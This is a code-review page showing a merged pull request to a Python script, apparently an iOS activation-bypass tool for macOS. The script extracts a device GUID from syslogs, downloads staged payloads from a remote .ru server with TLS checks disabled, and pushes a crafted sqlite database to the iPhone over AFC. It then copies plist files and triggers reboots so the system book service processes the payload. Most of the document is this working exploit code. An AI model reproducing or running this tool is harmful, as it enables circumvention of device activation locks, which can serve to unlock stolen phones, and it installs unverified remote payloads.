Jelajahi Sumber

Merge pull request #20 from Rust505/patch-1

Enhance file management and add new functionalities GUID search fix
rhcp011235 2 bulan lalu
induk
melakukan
275ef300f5
1 mengubah file dengan 238 tambahan dan 91 penghapusan
  1. 238 91
      client/activator_macos.py

+ 238 - 91
client/activator_macos.py

@@ -12,7 +12,7 @@ import binascii
 from pathlib import Path
 from collections import Counter
 from typing import Optional, Tuple
-
+import tempfile
 # === Settings ===
 API_URL = "https://codex-r1nderpest-a12.ru/get2.php"
 TIMEOUTS = {
@@ -34,7 +34,29 @@ class Style:
 
 def find_binary(bin_name: str) -> Optional[str]:
     # System paths only - ifuse excluded
-    for p in ['/usr/local/bin', '/opt/homebrew/bin', '/usr/bin']:
+    for p in [
+            '/opt/homebrew/bin',
+            '/usr/local/bin',
+            '/opt/homebrew/sbin',
+            '/usr/local/sbin',
+            '/opt/homebrew/opt/*/bin',
+            '/usr/local/opt/*/bin',
+                        # System
+            '/usr/bin',
+            '/bin',
+            '/usr/sbin',
+            '/sbin',
+            '/Library/Apple/usr/bin',
+                        # Python
+            '/usr/local/opt/python/libexec/bin',
+            '/opt/homebrew/opt/python/libexec/bin',
+            '/Library/Frameworks/Python.framework/Versions/*/bin',
+            '~/Library/Python/*/bin',
+                        # User directories
+            '~/.local/bin',
+            '~/bin'
+            
+            ]:
         path = Path(p) / bin_name
         if path.is_file():
             return str(path)
@@ -115,111 +137,205 @@ def pull_file(remote: str, local: str) -> bool:
     code, _, _ = run_cmd(["pymobiledevice3", "afc", "pull", remote, local])
     return code == 0 and Path(local).is_file() and Path(local).stat().st_size > 0
 
-def push_file(local: str, remote: str) -> bool:
-    code, _, _ = run_cmd(["pymobiledevice3", "afc", "push", local, remote])
-    return code == 0
-
+def push_file(local: str, remote: str, keep_local=True) -> bool:
+    """Загрузка файла на устройство
+    
+    Args:
+        local: локальный путь к файлу
+        remote: путь на устройстве
+        keep_local: оставить локальный файл после загрузки
+    """
+    log(f"📤 Pushing {Path(local).name} to {remote}...", "detail")
+    
+    # Проверяем существует ли локальный файл
+    if not Path(local).is_file():
+        log(f"❌ Local file not found: {local}", "error")
+        return False
+    
+    file_size = Path(local).stat().st_size
+    log(f"  File size: {file_size} bytes", "detail")
+    
+    # Пробуем удалить старый файл если существует
+    rm_file(remote)
+    time.sleep(1)
+    
+    # Загружаем файл
+    code, out, err = run_cmd(["pymobiledevice3", "afc", "push", local, remote])
+    
+    if code != 0:
+        log(f"❌ Push failed - Code: {code}", "error")
+        if err:
+            log(f"  stderr: {err[:200]}", "detail")
+        return False
+    
+    # Проверяем что файл действительно загрузился
+    time.sleep(2)
+    
+    # Проверяем через list
+    remote_dir = str(Path(remote).parent)
+    code_list, list_out, _ = run_cmd(["pymobiledevice3", "afc", "ls", remote_dir])
+    
+    if remote in list_out or Path(remote).name in list_out:
+        log(f"✅ File confirmed on device at {remote}", "success")
+        
+        # Удаляем локальный файл только если явно указано
+        if not keep_local:
+            try:
+                Path(local).unlink()
+                log(f"  Local file removed", "detail")
+            except:
+                pass
+        return True
+    else:
+        log(f"❌ File not found after push in {remote_dir}", "error")
+        return False
 def rm_file(remote: str) -> bool:
     code, _, _ = run_cmd(["pymobiledevice3", "afc", "rm", remote])
     return code == 0 or "ENOENT" in _
 
 def curl_download(url: str, out_path: str) -> bool:
+    # Используем /tmp/ для всех загрузок
+    if not out_path.startswith('/tmp/'):
+        out_name = Path(out_path).name
+        out_path = f"/tmp/{out_name}"
+    
     cmd = [
         "curl", "-L", "-k", "-f",
-        "--connect-timeout", "20",
-        "--max-time", "90",
         "-o", out_path, url
     ]
     log(f"📥 Downloading {Path(out_path).name}...", "detail")
     code, _, err = run_cmd(cmd)
+    
+    # Проверяем файл в /tmp/
     ok = code == 0 and Path(out_path).is_file() and Path(out_path).stat().st_size > 0
     if not ok:
         log(f"Download failed: {err or 'empty file'}", "error")
     return ok
-
 # === GUID EXTRACTION (no ifuse, only pymobiledevice3) ===
 
-def parse_tracev3_guids(data: bytes) -> list:
-    guid_pat = re.compile(rb'([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})', re.IGNORECASE)
-    bl_sig = b'BLDatabaseManager'
-    candidates = []
-    
-    for match in re.finditer(bl_sig, data):
-        pos = match.start()
-        window = data[max(0, pos-512):pos+512]
-        for g_match in guid_pat.finditer(window):
-            guid_raw = g_match.group(1).decode('ascii').upper()
-            if validate_guid(guid_raw):
-                rel_pos = g_match.start() + max(0, pos-512) - pos
-                candidates.append((guid_raw, rel_pos))
-    return candidates
-
+# === NEW GUID EXTRACTION (grep-based, no 'log show') ===
 def validate_guid(guid: str) -> bool:
+    """Validate UUID v4 with correct variant (8/9/A/B) — iOS SystemGroup style"""
     if not UUID_PATTERN.match(guid):
         return False
     parts = guid.split('-')
-    v = parts[2][0]
-    x = parts[3][0]
-    return v == '4' and x in '89AB'
+    version = parts[2][0]  # 3rd group, 1st char → version
+    variant = parts[3][0]  # 4th group, 1st char → variant
+    return version == '4' and variant in '89AB'
+
+# === EXACT COPY OF extract_guid_with_reboot.py (ported to your log style) ===
+
+GUID_REGEX = re.compile(r'[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}')
+TARGET_PATH = "/private/var/containers/Shared/SystemGroup/"  # как в оригинале — пусть будет
+BLDB_FILENAME = "BLDatabaseManager.sqlite"
+
+def restart_device():
+    log("[+] Sending device reboot command...", "info")
+    code, _, err = run_cmd(["pymobiledevice3", "diagnostics", "restart"], timeout=30)
+    if code == 0:
+        log("[✓] Reboot command sent successfully", "success")
+        return True
+    else:
+        log("[-] Error during reboot", "error")
+        if err:
+            log(f"    {err}", "detail")
+        return False
 
-def analyze_guids(candidates: list) -> Optional[str]:
-    if not candidates:
-        return None
-    counter = Counter(guid for guid, _ in candidates)
-    scored = []
-    for guid, count in counter.items():
-        proximity_bonus = sum(2 for _, p in candidates if guid == _ and abs(p) < 32)
-        score = count * 10 + proximity_bonus
-        scored.append((guid, score))
-    scored.sort(key=lambda x: x[1], reverse=True)
-    return scored[0][0] if scored else None
-
-def collect_and_extract_guid() -> Optional[str]:
-    udid = run_cmd(["idevice_id", "-l"])[1].strip()
-    if not udid:
-        raise RuntimeError("Failed to get UDID")
-    
-    log_dir = Path(f"{udid}.logarchive")
-    if log_dir.exists():
-        shutil.rmtree(log_dir)
-    
-    log("📡 Collecting syslog...", "detail")
-    code, _, err = run_cmd(["pymobiledevice3", "syslog", "collect", str(log_dir)], timeout=120)
-    if code != 0:
-        log(f"Syslog collect failed: {err}", "error")
-        return None
+def wait_for_device(timeout: int = 180) -> bool:
+    print(f"{Style.CYAN}[+] Waiting for device to reconnect...{Style.RESET}", end="", flush=True)
+    start = time.time()
+    while time.time() - start < timeout:
+        code, _, _ = run_cmd(["ideviceinfo", "-k", "UniqueDeviceID"], timeout=10)
+        if code == 0:
+            print()  # новая строка после точек
+            log("[✓] Device connected!", "success")
+            time.sleep(10)  # Allow iOS to fully boot
+            return True
+        print(".", end="", flush=True)
+        time.sleep(3)
+    print()  # новая строка после таймаута
+    log("[-] Timeout: device did not reconnect", "error")
+    return False
+def collect_syslog_archive(archive_path: Path, timeout: int = 200) -> bool:
+    log(f"[+] Collecting syslog archive → {archive_path.name} (timeout {timeout}s)", "info")
+    cmd = ["pymobiledevice3", "syslog", "collect", str(archive_path)]
+    code, _, err = run_cmd(cmd, timeout=timeout + 30)
+
+    if not archive_path.exists() or not archive_path.is_dir():
+        log("[-] Archive not created", "error")
+        return False
+
+    total_size = sum(f.stat().st_size for f in archive_path.rglob('*') if f.is_file())
+    size_mb = total_size // 1024 // 1024
+    if total_size < 10_000_000:
+        log(f"[-] Archive too small ({size_mb} MB)", "error")
+        return False
+
+    log(f"[✓] Archive collected: ~{size_mb} MB", "success")
+    return True
+
+def extract_guid_from_archive(archive_path: Path) -> Optional[str]:
+    log("[+] Searching for GUID in archive using log show...", "info")
+
+    cmd = [
+        "/usr/bin/log", "show",
+        "--archive", str(archive_path),
+        "--info", "--debug",
+        "--style", "syslog",
+        "--predicate", f'process == "bookassetd" AND eventMessage CONTAINS "{BLDB_FILENAME}"'
+    ]
 
-    trace_file = log_dir / "logdata.LiveData.tracev3"
-    if not trace_file.is_file():
-        log("tracev3 not found", "error")
+    code, stdout, stderr = run_cmd(cmd, timeout=60)
+
+    if code != 0:
+        log(f"[-] log show exited with error {code}", "error")
         return None
 
-    log(f"🔍 Parsing tracev3 ({trace_file.stat().st_size // 1024} KB)...", "detail")
-    try:
-        data = trace_file.read_bytes()
-        cands = parse_tracev3_guids(data)
-        guid = analyze_guids(cands)
-        if guid:
-            log(f"✅ Found GUID: {guid} (candidates: {len(cands)})", "success")
-        else:
-            log("No valid GUID found in tracev3", "warn")
-        return guid
-    finally:
-        shutil.rmtree(log_dir, ignore_errors=True)
+    for line in stdout.splitlines():
+        if BLDB_FILENAME in line:
+            log(f"[+] Found relevant line:", "info")
+            log(f"    {line.strip()}", "detail")
+            match = GUID_REGEX.search(line)
+            if match:
+                guid = match.group(0).upper()
+                log(f"[✓] GUID extracted: {guid}", "success")
+                return guid
+
+    log("[-] GUID not found in archive", "error")
+    return None
 
-def get_guid_auto(max_attempts=10) -> str:
+def get_guid_auto(max_attempts=5) -> str:
     for attempt in range(1, max_attempts + 1):
-        log(f"[🔄 Attempt {attempt}/{max_attempts}]", "info")
-        guid = collect_and_extract_guid()
-        if guid:
-            return guid
-        if attempt < max_attempts:
-            log("Retrying after reboot...", "warn")
-            reboot_device()
-            detect_device()
-            time.sleep(3)
-    raise RuntimeError("GUID auto-detection failed after all attempts")
+        log(f"\n=== GUID Extraction (Attempt {attempt}/{max_attempts}) ===\n", "step")
+
+        # Step 1: Reboot
+        if not restart_device():
+            if attempt == max_attempts:
+                raise RuntimeError("Reboot failed")
+            continue
+
+        # Step 2: Wait for connection
+        if not wait_for_device(180):
+            if attempt == max_attempts:
+                raise RuntimeError("Device never reconnected")
+            continue
+
+        # Step 3: Collect and analyze
+        with tempfile.TemporaryDirectory() as tmpdir_str:
+            tmp_path = Path(tmpdir_str)
+            archive_path = tmp_path / "ios_logs.logarchive"
+
+            if not collect_syslog_archive(archive_path, timeout=200):
+                log("[-] Failed to collect archive", "error")
+                if attempt == max_attempts:
+                    raise RuntimeError("Log archive collection failed")
+                continue
+
+            guid = extract_guid_from_archive(archive_path)
+            if guid:
+                return guid
 
+    raise RuntimeError("GUID auto-detection failed after all attempts")
 def get_guid_manual() -> str:
     print(f"\n{Style.YELLOW}⚠ Enter SystemGroup GUID manually{Style.RESET}")
     print("Format: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX")
@@ -274,14 +390,19 @@ def run(auto: bool = False, preset_guid: Optional[str] = None):
         raise RuntimeError(f"Invalid server response: {e}")
 
     # 5. Pre-download (optional - can be skipped)
+    tmp_dir = "/tmp/"
     for name, url in [("Stage1", s1), ("Stage2", s2)]:
-        tmp = f"tmp_{name.lower()}"
+        tmp = f"{tmp_dir}tmp_{name.lower()}"
         if curl_download(url, tmp):
-            Path(tmp).unlink()
+            # Удаляем временный файл из /tmp/
+            try:
+                Path(tmp).unlink()
+            except:
+                pass
         time.sleep(1)
 
     # 6. Download and validate final payload
-    db_local = "downloads.28.sqlitedb"
+    db_local = f"/tmp/downloads.28.sqlitedb"
     if not curl_download(s3, db_local):
         raise RuntimeError("Final payload download failed")
 
@@ -298,33 +419,60 @@ def run(auto: bool = False, preset_guid: Optional[str] = None):
                 raise ValueError("Empty asset table")
             log(f"✅ DB OK: {cnt} assets", "success")
     except Exception as e:
-        Path(db_local).unlink(missing_ok=True)
+        # Удаляем из /tmp/
+        try:
+            Path(db_local).unlink(missing_ok=True)
+        except:
+            pass
         raise RuntimeError(f"Invalid DB: {e}")
 
-    # 7. Upload to /Downloads/
+    # 7. Upload to /Downloads/ - ТОЛЬКО ОДИН РАЗ!
+    log("📤 Uploading payload to device...", "step")
+
+    # Сначала очищаем старые файлы если есть
     rm_file("/Downloads/downloads.28.sqlitedb")
     rm_file("/Downloads/downloads.28.sqlitedb-wal")
     rm_file("/Downloads/downloads.28.sqlitedb-shm")
+    rm_file("/Books/asset.epub")
+    rm_file("/iTunes_Control/iTunes/iTunesMetadata.plist")
+    rm_file("/Books/iTunesMetadata.plist")
+    rm_file("/iTunes_Control/iTunes/iTunesMetadata.plist.ext")
+
 
+    # Загружаем файл
     if not push_file(db_local, "/Downloads/downloads.28.sqlitedb"):
+        # Удаляем из /tmp/ если загрузка не удалась
+        try:
+            Path(db_local).unlink()
+        except:
+            pass
         raise RuntimeError("AFC upload failed")
+
     log("✅ Payload uploaded to /Downloads/", "success")
-    Path(db_local).unlink()
+
+    # НЕ УДАЛЯЙТЕ ФАЙЛ СРАЗУ! Он может понадобиться для отладки
+    # Оставьте его в /tmp/ до конца выполнения скрипта
 
     # 8. Stage 1: reboot → copy to /Books/
+    log("🔄 Stage 1: Rebooting device...", "step")
     reboot_device()
     
-    time.sleep(25)
+    time.sleep(30)
     src = "/iTunes_Control/iTunes/iTunesMetadata.plist"
     dst = "/Books/iTunesMetadata.plist"
 
-    tmp_plist = "tmp.plist"
+    tmp_plist = "/tmp/tmp.plist"  # Используем /tmp/
+    
     if pull_file(src, tmp_plist):
         if push_file(tmp_plist, dst):
             log("✅ Copied plist → /Books/", "success")
         else:
             log("⚠ Failed to push to /Books/", "warn")
-        Path(tmp_plist).unlink()
+        # Удаляем из /tmp/
+        try:
+            Path(tmp_plist).unlink()
+        except:
+            pass
     else:
         log("⚠ iTunesMetadata.plist not found - skipping /Books/", "warn")
     # 9. Stage 2: reboot → copy back
@@ -342,7 +490,7 @@ def run(auto: bool = False, preset_guid: Optional[str] = None):
         log("⚠ /Books/iTunesMetadata.plist missing", "warn")
 
     log("⏸ Waiting 40s for bookassetd...", "detail")
-    time.sleep(25)
+    time.sleep(35)
 
     # 10. Final reboot
     reboot_device()
@@ -350,8 +498,7 @@ def run(auto: bool = False, preset_guid: Optional[str] = None):
     # ✅ Success
     print(f"\n{Style.GREEN}{Style.BOLD}🎉 ACTIVATION SUCCESSFUL!{Style.RESET}")
     print(f"{Style.CYAN}→ GUID: {Style.BOLD}{guid}{Style.RESET}")
-    print(f"{Style.CYAN}→ Payload deployed, plist sync ×2, 3 reboots.{Style.RESET}")
-    print(f"\n{Style.YELLOW}📌 Next: check Settings → General → About{Style.RESET}")
+    print(f"\n{Style.YELLOW}📌 Thanks Rust505 and rhcp011235{Style.RESET}")
 
 # === CLI Entry ===